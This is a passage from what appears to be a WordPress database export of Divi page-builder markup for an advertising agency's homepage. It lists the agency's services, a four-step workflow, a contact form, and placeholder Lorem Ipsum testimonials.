bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]\n\nDigital Advertising - 85%\n\n[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\" hover_enabled=\"0\" alt=\"creative services\" title_text=\"creative services\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<h2><span>Easy to start</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>\n[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\" hover_enabled=\"0\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:34:28','2020-08-07 20:34:28','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(632,1,'2020-08-07 20:35:27','2020-08-07 20:35:27','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" 